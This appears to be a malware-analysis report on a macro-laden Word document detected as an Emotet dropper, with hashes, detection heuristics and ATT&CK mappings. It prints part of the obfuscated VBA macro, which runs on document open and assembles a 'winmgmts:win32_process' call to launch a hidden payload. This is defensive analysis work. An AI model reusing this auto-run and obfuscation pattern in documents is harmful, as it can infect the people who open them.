Emotet — Office (OOXML) malware analysis

Static analysis result for SHA-256 35399aa0198e6eaa…

MALICIOUS

Office (OOXML)

128.1 KB Created: 2020-01-31 19:42:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-04
MD5: 79b4224e5dc0f5d50469f3967df151ae SHA-1: d6b2f02be92411d0f25a9a066b8cde4829cf0f9a SHA-256: 35399aa0198e6eaa75c1067a65180500ac022d96f6bbf51a27b2c626e65ffcc9
264 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Emotet-7572661-0, indicating it's a known Emotet variant. The presence of a Document_Open macro and obfuscated VBA code strongly suggests it's designed to download and execute a secondary payload. The VBA code uses obfuscation techniques and calls GetObject, consistent with Emotet's behavior.

Heuristics 7

  • ClamAV: Doc.Dropper.Emotet-7572661-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-7572661-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8692 bytes
SHA-256: f576441decd9c5abba082cf895d8072fa89005c5c54232d594e1e36d2c480702
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Eupvgyresx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   pl34 _
= "{TipTopPo}"
j3u = Edmotpdqfkjxh + Auacaaomtv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Mdmadoavics + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qsioczduna)
ndko24 = "{TipTopPo}"
nsih6 = 239 + 893 + 636
akj3 = 868 + 756
kqkqn4 = (Ivxqrtswzq) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kgjgidybdsji
Mplapgma.Pqsdmifqouiss
End Sub


Attribute VB_Name = "Yuqmslzswwycl"
Attribute VB_Base = "0{579E53AB-BE00-459F-8F0D-F494EBF40C6B}{34353EDD-D899-46E5-B121-745F0A40376F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Mplapgma"
Function Pqsdmifqouiss()
   pl34 _
= "{TipTopPo}"
j3u = Bjofvbhxhhko + Kxebzguhiid
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Poivfccvwpsk + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zedoebhbhyg)
ndko24 = "{TipTopPo}"
nsih6 = 807 + 124 + 223
akj3 = 793 + 964
kqkqn4 = (Xuafbvisi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Eleuoilqrs
Qssxvhhq = "/34//22/778//0//3/wi/34//22/778//0//3/nm/34//22/778//0//3/g/34//22/778//0//3/mt/34//22/778//0//3/" + ChrW(Int(wdKeyS)) + "/34//22/778//0//3/:w/34//22/778//0//3/in/34//22/778//0//3/32/34//22/778//0//3/_" + Yuqmslzswwycl.Vaumcniw + "r/34//22/778//0//3/oc/34//22/778//0//3/e/34//22/778//0//3/s/34//22/778//0//3/s"
   pl34 _
= "{TipTopPo}"
j3u = Zwuzcutxi + Kpaghoeojudaf
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Gekzvdqwy + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Dquwwzdaifakg)
ndko24 = "{TipTopPo}"
nsih6 = 508 + 944 + 171
akj3 = 872 + 190
kqkqn4 = (Kjkwwpuwoo) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Gsutbpilou
Quaaasngkwx = Varxdtkcwm(Qssxvhhq)
   pl34 _
= "{TipTopPo}"
j3u = Brxdamqi + Dljucipzxqwq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Lzpgiixekkc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Gunvpxsw)
ndko24 = "{TipTopPo}"
nsih6 = 698 + 358 + 246
akj3 = 348 + 180
kqkqn4 = (Nywjbdagkzi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Xjzrxzbz
Set Hgfvzjsefnnn = GetObject(Quaaasngkwx)
   pl34 _
= "{TipTopPo}"
j3u = Tzxxvzdfma + Cxwqcnkqtc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qzyjcjxbmb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ismsttnhmvyt)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 875 + 999
akj3 = 584 + 338
kqkqn4 = (Yizntrjm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Btdcdsxaochjb
Qvxgssfdwu = Yuqmslzswwycl.Igcttfmk.Tag
   pl34 _
= "{TipTopPo}"
j3u = Yfknkqvg + Xwhnszpxtg
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Cefaxqhmxjnb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nmvhmongtodmc)
ndko24 = "{TipTopPo}"
nsih6 = 251 + 170 + 847
akj3 = 436 + 660
kqkqn4 = (Pbkihdghktey) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Nifoulcclt
Hunodmcel = Quaaasngkwx + ChrW(Int(wdKeyS)) + Yuqmslzswwycl.Kcayeyzlzbvf.Tag + Qvxgssfdwu
   pl34 _
= "{TipTopPo}"
j3u = Bhevvreldf + Owjhskmqv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Rhtstnmlgin + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zdyaifmhxkjji)
ndko24 = "{TipTopPo}"
nsih6 = 196 + 747 + 874
akj3 = 414 + 347
kqkqn4 = (Fmlqtunnbzkx) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ixaljiolliqv
Zwndiejpwjmo = Hunodmcel + Yuqmslzswwycl.Vaumcniw
   pl34 _
= "{TipTopPo}"
j3u = Qhofmcqavggcn + Kamhfpcwxjsnc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Bgusarqf + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Eafgyzhkitogj)
ndko24 = "{TipTopPo}"
nsih6 = 856 + 603 + 957
akj3 = 372 + 425
kqkqn4 = (Olrvtporsf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ueitvzjbo
Set Rcyklzqzxbej = Figrtjza(Zwndiejpwjmo)
   pl34 _
= "{TipTopPo}"
j3u = Stkqami
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 56832 bytes
SHA-256: a95c60b9f1b12ce0318b49db6f0149dba894f256011dde34f464c69e9153d383
Detection
ClamAV: Doc.Dropper.Emotet-7572661-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).